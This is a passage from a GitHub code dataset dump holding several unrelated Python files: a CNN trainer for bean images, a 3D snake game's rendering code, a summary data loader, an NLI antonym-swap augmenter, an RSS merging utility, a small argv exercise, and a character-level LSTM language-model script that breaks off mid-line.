MyDataset(Dataset):\n def __init__(self, data_path, train=True):\n\n if train:\n self.dataset = load_dataset(\"imagefolder\", data_dir=data_path, drop_labels=False, split=\"train\")\n self.dataset = self.dataset.map(self.img_resize, remove_columns=[\"image\"], batched=True)\n self.dataset.set_transform(self.transforms)\n else:\n self.dataset = load_dataset(\"imagefolder\", data_dir=data_path, drop_labels=False, split=\"test\")\n self.dataset = self.dataset.map(self.img_resize, remove_columns=[\"image\"], batched=True)\n self.dataset.set_transform(self.test_transform)\n\n def transforms(self, imgs):\n augment = Compose([\n RandomHorizontalFlip(p=0.5), \n RandomVerticalFlip(p=0.5),\n ColorJitter(brightness=0.1,\n contrast=0.1,\n saturation=0.1,\n hue=0),\n RandomRotation(degrees=45),\n RandomAffine(degrees=10),\n ToTensor()\n ])\n imgs[\"pixel_values\"] = [augment(image) for image in imgs[\"pixel_values\"]]\n return imgs\n\n def test_transform(self, imgs):\n augment = Compose([ToTensor()])\n imgs[\"pixel_values\"] = [augment(image) for image in imgs[\"pixel_values\"]]\n return imgs\n\n def img_resize(self, imgs):\n imgs[\"pixel_values\"] = [image.convert(\"RGB\").resize((100,100)) for image in imgs[\"image\"]]\n return imgs\n\n def __getitem__(self, index):\n data = self.dataset[index]\n label = F.one_hot(torch.tensor(data[\"label\"]), num_classes=3)\n return data[\"pixel_values\"], label.float()\n\n def __len__(self):\n return len(self.dataset)\n#bean_data_train = MyDataset(\"../../beans\",train)\n\n#img = bean_data_train[0][\"pixel_values\"]\n#plt.imshow(np.transpose(img, (1,2,0)))\n\n\n#type(bean_data_train)\n\n## Build the Model\n\n\n\"\"\"\nCNN class\n - Can take layers argument to define number of channels and depth\n - Number of input channels will always be 3\n - Currently the first layer is hardcoded with kernel size 7, and stride 2\n I think this should be reduced to 5 or even 3.\n - The class Block defines a block of 2 conv layers. This could be extended to 3\n and include a skip. Could also include params for kernal size and striding\n - Normalization is performed here instead of in Utils \n\"\"\"\n\nclass ConvoClassifier(torch.nn.Module):\n\n class Block(torch.nn.Module):\n def __init__(self, n_input, n_output, stride=1):\n super().__init__()\n\n # Defines a two layer block with stride in first layer only, batch norm after each\n self.net = torch.nn.Sequential(\n # Only the first layer is strided, can adjust this in the loop in the init method\n torch.nn.Conv2d(n_input, n_output, kernel_size=3,\n padding=1, stride=stride),\n torch.nn.ReLU(),\n torch.nn.Conv2d(n_output, n_output, kernel_size=3, padding=1),\n torch.nn.BatchNorm2d(n_output),\n torch.nn.ReLU()\n )\n\n def forward(self, x):\n return self.net(x)\n\n def __init__(self, layers=[32, 64, 128], n_input_channels=3, n_classes=3):\n super().__init__()\n # Inital layer with kernal size 7, the max pool appears to increase accuracy on validation set\n L = [torch.nn.Conv2d(n_input_channels, layers[0], kernel_size=7, padding=3, stride=2),\n torch.nn.ReLU(), torch.nn.MaxPool2d(kernel_size=3, stride=2, padding=1)]\n c = layers[0]\n # Build network from list of layers\n for l in layers:\n # can adjust stride here\n L.append(self.Block(c, l, stride=2))\n c = l\n\n self.network = torch.nn.Sequential(*L)\n # Linear layer at end for the 3 classification labels\n self.classifier = torch.nn.Linear(c, n_classes)\n # Mean and standard dev of color channels accross the entire training set\n self.norm = torchvision.transforms.Normalize(\n mean=[0.233, 0.298, 0.256], std=[0.199, 0.118, 0.201])\n\n def forward(self, x):\n # Normalize\n normx = self.norm(x)\n # Compute the features\n z = self.network(normx)\n # Global average pooling\n z = z.mean(dim=[2, 3])\n # Classify\n return self.classifier(z)\n\n# Save the model with epoch number and message/name of model (for checkpoints)\ndef save_model(model, message, epoch):\n name = message + '_' + str(epoch) + '_' + 'det.th'\n from torch import save\n from os import path\n return save(model.state_dict(), path.join(path.dirname(path.abspath(__file__)), name))\n\ndef load_model(model_name):\n from torch import load\n from os import path\n r = ConvoClassifier()\n r.load_state_dict(load(path.join(path.dirname(\n path.abspath(__file__)), model_name), map_location='cpu'))\n return r\n\n\n\n\n## Train the Model\n\n#from .models import ConvoClassifier, save_model, load_model\n#from .utils import MyDataset\n\n\"\"\"\nRunning tensorboard\n - launch terminal w/deeplearning virual env\n - run python -m tensorboard.main --logdir=runs\n - open in browser\n - enabels visualization of training loss and accuracy after each batch\n and validation accuracy after each epoch\n\"\"\"\n\n\"\"\"\nMain training loop\n - Takes training arguments\n - log_dir: directory of logs for tensorboard\n - run_info: short description of run for identification in tensorboard\n - lr: learning rate\n - ep: number of epochs\n - layers: takes multiple int values and constructs a list used for construction of model. \n Each number is number of channels and length of list is number of layers\n\n - Prints time and validation accuracy to consol after each epoch. Saves model at end\n - Note: each \"layer\" is a block of 2 convolutional layers, see models.py\n - Should add ability to customize learning rate schedule, currently decaying around \n 6 epochs gives good results \n\"\"\"\n\ndef load_data(dataset_path, num_workers=0, batch_size=256, train=True):\n dataset = MyDataset(dataset_path, train)\n return DataLoader(dataset, num_workers=num_workers, batch_size=batch_size, shuffle=True, drop_last=True)\n\ndef train(args):\n\n start = time()\n # model constructed here\n model = ConvoClassifier(args.layer_list, args.num_classes).to(device)\n\n # set up logger with the run info name\n train_logger, valid_logger = None, None\n if args.log_dir is not None:\n train_dir = \"train\" + args.run_info\n valid_dir = \"valid\" + args.run_info\n train_logger = tb.SummaryWriter(path.join(args.log_dir, train_dir))\n valid_logger = tb.SummaryWriter(path.join(args.log_dir, valid_dir))\n\n # Choice of optimizer, adam working better so far\n # optimizer = torch.optim.SGD(model.parameters(), lr=0.001, momentum=0.9)\n optimizer = torch.optim.Adam(model.parameters(), lr=args.learn_rate)\n\n # LR scheduler, will want to eventually add ability to customize args for this\n scheduler = torch.optim.lr_scheduler.StepLR(\n optimizer, step_size=6, gamma=0.2)\n step = 0\n\n\n train_data = load_data(args.data_dir,0,args.batch_size,True)\n val_data = load_data(args.data_dir,0,args.batch_size,False)\n\n # Main loop\n for epoch in range(args.num_epochs):\n startepoch = time()\n total_loss = 0\n\n # Make sure things are set to training mode\n model.train()\n for i, (x, y) in enumerate(train_data):\n\n x = x.to(device)\n y = y.to(device)\n output = model(x)\n l = F.cross_entropy(output, y)\n optimizer.zero_grad()\n l.backward()\n optimizer.step()\n total_loss += l\n\n # compute accuracy on training batch, need to get it back to CPU and change to numpy array\n acc = (output.argmax(1).type_as(y) ==\n y.argmax(1)).float().detach().cpu().numpy()\n acc = np.mean(acc)\n\n train_logger.add_scalar(\"Loss\", l, global_step=step)\n #train_logger.add_scalar(\"acc\", acc, global_step=step)\n step += 1\n\n # Test model on validation set after training epoch, make sure to set to eval mode\n model.eval()\n val_acc = np.array([])\n for i, (x, y) in enumerate(val_data):\n x = x.to(device)\n y = y.to(device)\n output = model(x)\n # compute accuracy on validation set, need to get it back to CPU and change to numpy array\n acc = (output.argmax(1).type_as(y) ==\n y.argmax(1)).float().detach().cpu().numpy()\n acc = np.mean(acc)\n val_acc = np.append(val_acc, acc)\n \n\n valid_logger.add_scalar(\n \"val_acc_epoch\", np.mean(val_acc), global_step=step)\n \n # End of epoch, print validation accurcy and epoch time\n endepoch = time()\n scheduler.step()\n print(np.mean(val_acc))\n print(\"epochtime\", endepoch-startepoch)\n\n # print total time of model and save\n end = time()\n print(\"total time\", end-start)\n save_model(model, args.run_info, args.num_epochs)\n\n\n\"\"\"\nArguments:\n - log_dir: directory of logs for tensorboard\n - run_info: short description of run for identification in tensorboard\n - lr: learning rate\n - ep: number of epochs\n - layers: takes multiple int values and constructs a list used for construction of model. \n Each number is number of channels and length of list is number of layers\n\"\"\"\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--log_dir', default='runs')\n parser.add_argument('-n', '--run_info', type=str)\n parser.add_argument('-lr', '--learn_rate', type=float, default=0.0001)\n parser.add_argument('-ep', '--num_epochs', type=int, default=4)\n # layer list requires at least one number. Multiple numbers seperated by a single space\n parser.add_argument('-layers', '--layer_list', nargs='+',\n type=int, default=[32, 64, 128])\n parser.add_argument('-data', '--data_dir', type=str, default='../../beans')\n parser.add_argument('-c', '--num_classes', type=int, default=3 )\n parser.add_argument('-bs', '--batch_size', type=int, default=256)\n\n args = parser.parse_args()\n train(args)\n","repo_name":"DavidHein96/davidhein96.github.io","sub_path":"posts/simple_conv/run_beans.py","file_name":"run_beans.py","file_ext":"py","file_size_in_byte":11091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31720563785","text":"import os\n\nimport numpy as np\nfrom OpenGL.GL import *\n\nimport lib.basic_shapes as bs\nimport lib.easy_shaders as es\nimport lib.transformations as tr\nimport lib.obj_handler as obj_reader\n\nfrom collections import deque\n\n\nclass Head():\n \n def __init__(self):\n self.x, self.y, self.z = 0.0, 0.0, -4.5\n self.theta = 0.0\n self.bend = 0.20\n self.front = 0.20\n self.turn = 0\n self.weirdLight = (1.0, 1.0, 1.0)\n self.transform = tr.matmul([tr.translate(self.x,self.y,self.z),tr.uniformScale(0.5),tr.rotationZ(self.theta)])\n \n def draw(self, objeto, pipeline, projection, view):\n glUseProgram(pipeline.shaderProgram)\n\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"La\"), 0.25*self.weirdLight[0], 0.25*self.weirdLight[1], 0.25*self.weirdLight[2])\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"Ld\"), 0.65*self.weirdLight[0], 0.65*self.weirdLight[1], 0.65*self.weirdLight[2])\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"Ls\"), 0.1*self.weirdLight[0], 0.1*self.weirdLight[1], 0.1*self.weirdLight[2])\n\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"Ka\"), 0.25, 0.25, 0.25)\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"Kd\"), 0.6, 0.6, 0.6)\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"Ks\"), 1.0, 1.0, 1.0)\n\n\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"lightPosition\"), 0, 0, 50)\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"viewPosition\"), self.x,self.y,self.z)\n glUniform1ui(glGetUniformLocation(pipeline.shaderProgram, \"shininess\"), 100)\n glUniform1f(glGetUniformLocation(pipeline.shaderProgram, \"constantAttenuation\"), 0.001)\n glUniform1f(glGetUniformLocation(pipeline.shaderProgram, \"linearAttenuation\"), 0.0001)\n glUniform1f(glGetUniformLocation(pipeline.shaderProgram, \"quadraticAttenuation\"), 0.0001)\n\n glUniformMatrix4fv(glGetUniformLocation(pipeline.shaderProgram, \"model\"), 1, GL_TRUE, self.transform)\n glUniformMatrix4fv(glGetUniformLocation(pipeline.shaderProgram, \"projection\"), 1, GL_TRUE, projection)\n glUniformMatrix4fv(glGetUniformLocation(pipeline.shaderProgram, \"view\"), 1, GL_TRUE, view)\n pipeline.drawShape(objeto)\n\n def move(self):\n self.x += self.front*np.cos(self.theta)\n self.y += self.front*np.sin(self.theta)\n self.transform = tr.matmul([tr.translate(self.x,self.y,self.z),tr.uniformScale(0.5),tr.rotationZ(self.theta)])\n\n \n def update(self):\n self.theta += self.bend*self.turn\n\nclass Body():\n \n def __init__(self):\n self.x, self.y, self.z = 0.0, 0.0, -4.5\n self.theta = 0.0\n self.transform = tr.matmul([tr.translate(self.x,self.y,self.z),tr.uniformScale(0.5),tr.rotationZ(self.theta)])\n self.weirdLight = (1.0, 1.0, 1.0)\n \n def draw(self, objeto, pipeline, projection, view):\n glUseProgram(pipeline.shaderProgram)\n\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"La\"), 0.25*self.weirdLight[0], 0.25*self.weirdLight[1], 0.25*self.weirdLight[2])\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"Ld\"), 0.65*self.weirdLight[0], 0.65*self.weirdLight[1], 0.65*self.weirdLight[2])\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"Ls\"), 0.1*self.weirdLight[0], 0.1*self.weirdLight[1], 0.1*self.weirdLight[2])\n\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"Ka\"), 0.25, 0.25, 0.25)\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"Kd\"), 0.6, 0.6, 0.6)\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"Ks\"), 1.0, 1.0, 1.0)\n\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"lightPosition\"), 0, 0, 50)\n glUniform3f(glGetUniformLocation(pipeline.shaderProgram, \"viewPosition\"), self.x, self.y, self.z)\n glUniform1ui(glGetUniformLocation(pipeline.shaderProgram, \"shininess\"), 100)\n glUniform1f(glGetUniformLocation(pipeline.shaderProgram, \"constantAttenuation\"), 0.001)\n glUniform1f(glGetUniformLocation(pipeline.shaderProgram, \"linearAttenuation\"), 0.0001)\n glUniform1f(glGetUniformLocation(pipeline.shaderProgram, \"quadraticAttenuation\"), 0.0001)\n\n glUniformMatrix4fv(glGetUniformLocation(pipeline.shaderProgram, \"model\"), 1, GL_TRUE, self.transform)\n glUniformMatrix4fv(glGetUniformLocation(pipeline.shaderProgram, \"projection\"), 1, GL_TRUE, projection)\n glUniformMatrix4fv(glGetUniformLocation(pipeline.shaderProgram, \"view\"), 1, GL_TRUE, view)\n pipeline.drawShape(objeto)\n\n def move(self):\n self.transform = tr.matmul([tr.translate(self.x,self.y,self.z),tr.uniformScale(0.5),tr.rotationZ(self.theta)])\n \n\nclass Snake():\n \n def __init__(self):\n self.alive = True\n self.objective = None\n self.floor = None\n self.snake_parts = [Head()]\n self.bodyTypeList = [1,0,2,3,4]\n self.weirdLight = (1.0, 1.0, 1.0)\n obj = os.path.join(\"objects\",\"dummy.obj\")\n bodyOBJ1 = obj_reader.readOBJ2(f'{obj}',os.path.join(\"objects\",\"textures\",\"dudeBlack.png\"))\n bodyOBJ2 = obj_reader.readOBJ2(f'{obj}',os.path.join(\"objects\",\"textures\",\"dudeRed.png\"))\n bodyOBJ3 = obj_reader.readOBJ2(f'{obj}',os.path.join(\"objects\",\"textures\",\"dudeWhite.png\"))\n bodyOBJ4 = obj_reader.readOBJ2(f'{obj}',os.path.join(\"objects\",\"textures\",\"dudeOrange.png\"))\n bodyOBJ5 = obj_reader.readOBJ2(f'{obj}',os.path.join(\"objects\",\"textures\",\"dudeGreen.png\"))\n self.GPU1 = es.toGPUShape(bodyOBJ1, GL_REPEAT, GL_NEAREST)\n self.GPU2 = es.toGPUShape(bodyOBJ2, GL_REPEAT, GL_NEAREST)\n self.GPU3 = es.toGPUShape(bodyOBJ3, GL_REPEAT, GL_NEAREST)\n self.GPU4 = es.toGPUShape(bodyOBJ4, GL_REPEAT, GL_NEAREST)\n self.GPU5 = es.toGPUShape(bodyOBJ5, GL_REPEAT, GL_NEAREST)\n self.positions = deque([])\n self.initial_size = 5\n self.length = 5\n for i in range(self.initial_size-1):\n self.snake_parts.append(Body())\n\n for i in range(1,self.initial_size):\n self.snake_parts[i].x += -0.3*i\n for j in np.arange(self.snake_parts[i-1].x,self.snake_parts[i].x,-0.1):\n self.positions.appendleft((j,0,0))\n self.snake_parts[i].move()\n \n def lightChange(self):\n for part in self.snake_parts:\n part.weirdLight = self.weirdLight\n \n def draw(self, pipeline, projection, view):\n if not self.alive:\n return\n for i in range(len(self.snake_parts)):\n if self.bodyTypeList[i] % 5 == 0:\n self.snake_parts[i].draw(self.GPU1, pipeline, projection, view)\n if self.bodyTypeList[i] % 5 == 1:\n self.snake_parts[i].draw(self.GPU2, pipeline, projection, view)\n if self.bodyTypeList[i] % 5 == 2:\n self.snake_parts[i].draw(self.GPU3, pipeline, projection, view)\n if self.bodyTypeList[i] % 5 == 3:\n self.snake_parts[i].draw(self.GPU4, pipeline, projection, view)\n if self.bodyTypeList[i] % 5 == 4:\n self.snake_parts[i].draw(self.GPU5, pipeline, projection, view)\n\n\n def growth(self):\n new_part = Body()\n self.snake_parts.append(new_part)\n self.snake_parts[-1].x, self.snake_parts[-1].y, self.snake_parts[-1].theta = self.positions[(self.length-1)*-3]\n self.snake_parts[-1].move()\n roll = np.random.randint(0,4)\n self.bodyTypeList.append(roll)\n self.length += 1\n\n\n def collisions(self):\n x, y = self.snake_parts[0].x, self.snake_parts[0].y\n\n if (x-self.objective.x)**2 + (y-self.objective.y)**2 < 1.0:\n if self.objective.rare%5 == 0:\n self.floor.weirdTimer += 200\n self.objective.exists = False\n self.objective.rare += 1\n self.growth()\n\n if x**2 > 100 or y**2 > 100:\n self.alive = False\n\n for i in range(1,len(self.snake_parts)):\n if (x - self.snake_parts[i].x)**2 + (y - self.snake_parts[i].y)**2 < 0.09:\n self.alive = False\n\n\n def move(self):\n if not self.alive:\n return\n for i in range(1,self.length):\n self.snake_parts[i].x, self.snake_parts[i].y, self.snake_parts[i].theta = self.positions[i*-3]\n self.snake_parts[i].move()\n self.snake_parts[0].update()\n self.snake_parts[0].move()\n self.positions.append((self.snake_parts[0].x,self.snake_parts[0].y,self.snake_parts[0].theta))\n while len(self.positions) > self.length * 10:\n self.positions.popleft()\n \n ","repo_name":"Gonxolo/tarea2Snake3D","sub_path":"models/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":8738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11444123799","text":"import os\nimport codecs\n\n\ndef data_generator(dirname):\n \"\"\"Transforms all summaries in directory into data objects for pipeline.\n\n Simply iterates over the directory and calls file_to_data.\n \"\"\"\n for root, dirs, files in os.walk(dirname):\n for name in files:\n # Exclude hidden files\n if not name[0] == \".\":\n topic_id = name[0:-9]\n filename = os.path.join(root, name)\n yield file_to_data(filename, topic_id)\n\n\ndef file_to_data(filename, topic_id):\n \"\"\"Transforms a single summary file into a data object for pipeline.\"\"\"\n # open file\n review_sentences = []\n with codecs.open(filename, \"r\", encoding='utf-8', errors='ignore') as fh:\n review_sentences = fh.read().splitlines()\n\n # put sentences in list of dicts\n body = [{'type': 'p', 'content': p} for p in review_sentences]\n\n # Create dictionary of doc_id and body\n data = {'topic_id': topic_id, 'body': body, 'summaries': []}\n\n return data\n\n\ndef add_summaries(articles, dirname):\n \"\"\"Adds summaries from summary directory to the correct article object.\"\"\"\n all_summaries = {}\n for root, dirs, files in os.walk(dirname, topdown=True):\n for name in files:\n filename = os.path.join(root, name)\n # Cluster id is in the first 7 characters of the filename\n with open(filename, 'rb') as fh:\n summary = fh.read()\n # Add summary to right list (or initiate topic if not existing yet)\n topic_id = name[:-7]\n if topic_id in all_summaries:\n all_summaries[topic_id] += [summary]\n else:\n all_summaries[topic_id] = [summary]\n\n # Add list of summaries to corresponding article objects\n for article in articles:\n article['summaries'] = all_summaries[article['topic_id']]","repo_name":"blendle/research-summarization","sub_path":"data_extractors/opinosisprocessor.py","file_name":"opinosisprocessor.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"10691598992","text":"import random\n\nimport numpy as np\nimport pandas as pd\nfrom datasets import ClassLabel, Dataset\nfrom nltk.wsd import lesk\nfrom tqdm import tqdm\n\n\nclass swap_ant_augmentation:\n def __init__(self):\n pass\n\n def infer(self, dataset, n_workers=\"max\"):\n datacols = list(dataset.features.keys()) + [\"mapping\"]\n new_dataset = {k: [] for k in datacols}\n\n for i in tqdm(range(len(dataset))):\n if dataset[\"label\"][i] == 0:\n premise_tokens = dataset[\"premise\"][i].split()\n hypothesis_tokens = dataset[\"hypothesis\"][i].split()\n new_hyp = dataset[\"premise\"][i]\n flag = False\n for num, pr_token in enumerate(premise_tokens):\n best_sense = lesk(premise_tokens, pr_token)\n if best_sense is not None and (\n best_sense.pos() == \"s\" or best_sense.pos() == \"n\"\n ):\n for lemma in best_sense.lemmas():\n possible_antonyms = lemma.antonyms()\n for antonym in possible_antonyms:\n if \"_\" in antonym._name or antonym._name == \"civilian\":\n continue\n if pr_token not in hypothesis_tokens:\n continue\n new_hyp = new_hyp.replace(pr_token, antonym._name)\n flag = True\n\n if flag:\n new_dataset[\"hypothesis\"].append(new_hyp)\n new_dataset[\"premise\"].append(dataset[\"premise\"][i])\n new_dataset[\"label\"].append(2)\n new_dataset[\"mapping\"].append(i)\n for k in datacols:\n if k not in [\"premise\", \"hypothesis\", \"label\", \"mapping\"]:\n new_dataset[k].append(dataset[k][i])\n\n new_dataset = pd.DataFrame(new_dataset)\n return Dataset.from_pandas(new_dataset).cast_column(\"label\", dataset.features[\"label\"])\n","repo_name":"Maitreyapatel/reliability-checklist","sub_path":"reliability_checklist/augmentation/mnli/swap_ant.py","file_name":"swap_ant.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"74730839092","text":"import os\nfrom io import StringIO\nfrom typing import List, Union, Optional\nfrom xml.etree import ElementTree as et\n\nfrom xyw_eyes.rss.rss import RSS2\n\n\ndef merge_rss(name: str, files: Union[List[str], str], rss: Optional[RSS2] = None) -> None:\n \"\"\"\n 合并多个rss文件,可以通过传入RSS2对象自定义新rss文件的channel属性,没有传入时默认使用第一个文件的channel属性\n :param name: 新rss文件的保存地址\n :param files: 待合并rss文件的地址列表\n :param rss: 新rss文件的RSS2实例\n :return:\n \"\"\"\n rss_items = []\n if isinstance(files, str):\n files = [files]\n for file in files:\n if not os.path.isfile(file):\n raise ValueError('file \"{}\" does not exists'.format(file))\n rss_items.append(et.parse(file).findall('.//item'))\n if rss is not None:\n rss = et.parse(StringIO(rss.to_xml()))\n else:\n rss = et.parse(files[0])\n root = rss.getroot()\n channel = root.find('channel')\n for item in rss.findall('.//item'):\n channel.remove(item)\n items = [item for items in rss_items for item in items]\n root = rss.getroot()\n for item in items:\n root.find('channel').append(item)\n rss.write(name, encoding='utf-8', xml_declaration=True)\n\n\nif __name__ == '__main__':\n rss = RSS2(\n title='标题',\n link='https://www.douyu.com/',\n description='描述'\n )\n rss.set_build_time_now()\n merge_rss('douyu.xml', ['../../rss_spider/xml/douyu.xml', '../../rss_spider/xml/156xe.xml'], rss)\n","repo_name":"xue0228/rss","sub_path":"xyw_eyes/rss/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35119940913","text":"#!/usr/bin/env python3\nimport getopt\nimport sys\n#este programa se ejecuta de la siguiente manera:\n#python3 ejercicio2.py \"hola\" \"3\"\n\ndef main():\n text=sys.argv[1]\n x=int(sys.argv[2])\n\n list=text*(x)\n print(list)\n \n \n\nif __name__ == \"__main__\":\n main()\n \n\n \n","repo_name":"AugustoKark/Computacion2_AK2023","sub_path":"Ejercicios_Clases/Clase2/ejercicio2.py","file_name":"ejercicio2.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"368393124","text":"\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--language\", dest=\"language\", type=str)\nparser.add_argument(\"--load-from\", dest=\"load_from\", type=str)\n#parser.add_argument(\"--save-to\", dest=\"save_to\", type=str)\nparser.add_argument(\"--gpu\", dest=\"gpu\", type=bool)\n\n\nimport random\n\nparser.add_argument(\"--batchSize\", type=int, default=64)\nparser.add_argument(\"--char_embedding_size\", type=int, default=100)\nparser.add_argument(\"--hidden_dim\", type=int, default=2048)\nparser.add_argument(\"--layer_num\", type=int, default=2)\nparser.add_argument(\"--weight_dropout_in\", type=float, default=0.3)\nparser.add_argument(\"--weight_dropout_hidden\", type=float, default=0.25)\nparser.add_argument(\"--char_dropout_prob\", type=float, default=0.05)\nparser.add_argument(\"--char_noise_prob\", type = float, default= 0.0)\nparser.add_argument(\"--learning_rate\", type = float, default= 0.4)\nparser.add_argument(\"--myID\", type=int, default=random.randint(0,1000000000))\nparser.add_argument(\"--sequence_length\", type=int, default=50)\n\n\nargs=parser.parse_args()\nprint(args)\n\n\ndef device(x):\n if args.gpu:\n return x.cuda()\n else:\n return x\n\n\n\nfrom acqdivReader import AcqdivReader, AcqdivReaderPartition\n\nacqdivCorpusReader = AcqdivReader(args.language)\n\n\n\ndef plus(it1, it2):\n for x in it1:\n yield x\n for x in it2:\n yield x\n\ntry:\n with open(\"/checkpoint/mhahn/char-vocab-acqdiv-\"+args.language, \"r\") as inFile:\n itos = inFile.read().strip().split(\"\\n\")\nexcept FileNotFoundError:\n print(\"Creating new vocab\")\n char_counts = {}\n # get symbol vocabulary\n with open(\"/private/home/mhahn/data/acqdiv/\"+args.language+\"-vocab.txt\", \"r\") as inFile:\n words = inFile.read().strip().split(\"\\n\")\n for word in words:\n for char in word.lower():\n char_counts[char] = char_counts.get(char, 0) + 1\n char_counts = [(x,y) for x, y in char_counts.items()]\n itos = [x for x,y in sorted(char_counts, key=lambda z:(z[0],-z[1]))]\n with open(\"/checkpoint/mhahn/char-vocab-acqdiv-\"+args.language, \"w\") as outFile:\n print(\"\\n\".join(itos), file=outFile)\n#itos = sorted(itos)\nitos.append(\"\\n\")\nitos.append(\" \")\nprint(itos)\nstoi = dict([(itos[i],i) for i in range(len(itos))])\n\nhalfSequenceLength = int(args.sequence_length/2)\n\n\n\nimport random\n\n\nimport torch\n\nprint(torch.__version__)\n\nfrom weight_drop import WeightDrop\n\n\nrnn = device(torch.nn.LSTM(args.char_embedding_size, args.hidden_dim, args.layer_num))\n\nrnn_parameter_names = [name for name, _ in rnn.named_parameters()]\nprint(rnn_parameter_names)\n\n\nrnn_drop = WeightDrop(rnn, [(name, args.weight_dropout_in) for name, _ in rnn.named_parameters() if name.startswith(\"weight_ih_\")] + [ (name, args.weight_dropout_hidden) for name, _ in rnn.named_parameters() if name.startswith(\"weight_hh_\")])\n\n# -1, because whitespace doesn't actually appear\noutput = device(torch.nn.Linear(args.hidden_dim, len(itos)-1+3))\nchar_embeddings = device(torch.nn.Embedding(num_embeddings=len(itos)-1+3, embedding_dim=args.char_embedding_size))\n\nlogsoftmax = torch.nn.LogSoftmax(dim=2)\n\ntrain_loss = torch.nn.NLLLoss(ignore_index=0)\nprint_loss = torch.nn.NLLLoss(size_average=False, reduce=False, ignore_index=0)\nchar_dropout = torch.nn.Dropout2d(p=args.char_dropout_prob)\n\nmodules = [rnn, output, char_embeddings]\ndef parameters():\n for module in modules:\n for param in module.parameters():\n yield param\n\nparameters_cached = [x for x in parameters()]\n\noptim = torch.optim.SGD(parameters(), lr=args.learning_rate, momentum=0.0) # 0.02, 0.9\n\nnamed_modules = {\"rnn\" : rnn, \"output\" : output, \"char_embeddings\" : char_embeddings, \"optim\" : optim}\n\nif args.load_from is not None:\n checkpoint = torch.load(\"/checkpoint/mhahn/\"+args.load_from+\".pth.tar\")\n for name, module in named_modules.items():\n module.load_state_dict(checkpoint[name])\n\nfrom torch.autograd import Variable\n\n# ([0] + [stoi[training_data[x]]+1 for x in range(b, b+sequence_length) if x < len(training_data)]) \n\n#from embed_regularize import embedded_dropout\n\n\ndef prepareDatasetChunks(data, train=True):\n numeric = [0]\n boundaries = [None for _ in range(args.sequence_length+1)]\n count = 0\n currentWord = \"\"\n print(\"Prepare chunks\")\n for chunk in data:\n print(len(chunk))\n for char in chunk:\n if char == \" \":\n boundaries[len(numeric)] = currentWord\n currentWord = \"\"\n continue\n count += 1\n currentWord += char\n# if count % 100000 == 0:\n# print(count/len(data))\n numeric.append((stoi[char]+3 if char in stoi else 2) if (not train) or random.random() > args.char_noise_prob else 2+random.randint(0, len(itos)))\n if len(numeric) > args.sequence_length:\n yield numeric, boundaries\n numeric = [0]\n boundaries = [None for _ in range(args.sequence_length+1)]\n\n\n# from each bath element, get one positive example OR one negative example\n\nwordsSoFar = set()\nhidden_states = []\nlabels = []\nlabels_sum = 0\n\ndef forward(numeric, train=True, printHere=False):\n global labels_sum\n numeric, boundaries = zip(*numeric)\n# print(numeric)\n # print(boundaries)\n\n input_tensor = Variable(device(torch.LongTensor(numeric).transpose(0,1)[:-1]), requires_grad=False)\n target_tensor = Variable(device(torch.LongTensor(numeric).transpose(0,1)[1:]), requires_grad=False)\n\n embedded = char_embeddings(input_tensor)\n if train:\n embedded = char_dropout(embedded)\n\n out, _ = rnn_drop(embedded, None)\n# if train:\n# out = dropout(out)\n\n for i in range(len(boundaries)):\n target = (labels_sum + 10 < len(labels)/2) or (random.random() < 0.5)\n #if :\n \n# print(boundaries[i])\n# print(target)\n# print(boundaries[i]) \n true = sum([((x == None) if target == False else (x not in wordsSoFar)) for x in boundaries[i][int(args.sequence_length/2):-1]])\n # print(target, true)\n if true == 0:\n continue\n soFar = 0\n for j in range(len(boundaries[i])):\n if j < int(len(boundaries[i])/2):\n continue\n if (lambda x:((x is None if target == False else x not in wordsSoFar)))(boundaries[i][j]):\n # print(i, target, true,soFar)\n if random.random() < 1/(true-soFar):\n hidden_states.append(out[j,i].detach().data.cpu().numpy())\n labels.append(1 if target else 0)\n labels_sum += labels[-1]\n if target:\n wordsSoFar.add(boundaries[i][j])\n break\n soFar += 1\n assert soFar < true\n# print(hidden_states)\n# print(labels)\n\n logits = output(out) \n log_probs = logsoftmax(logits)\n # print(logits)\n # print(log_probs)\n # print(target_tensor)\n\n loss = train_loss(log_probs.view(-1, len(itos)-1+3), target_tensor.view(-1))\n\n if printHere:\n lossTensor = print_loss(log_probs.view(-1, len(itos)-1+3), target_tensor.view(-1)).view(args.sequence_length, len(numeric))\n losses = lossTensor.data.cpu().numpy()\n# boundaries_index = [0 for _ in numeric]\n for i in range((args.sequence_length-1)-1):\n # if boundaries_index[0] < len(boundaries[0]) and i+1 == boundaries[0][boundaries_index[0]]:\n # boundary = True\n # boundaries_index[0] += 1\n # else:\n # boundary = False\n print((losses[i][0], 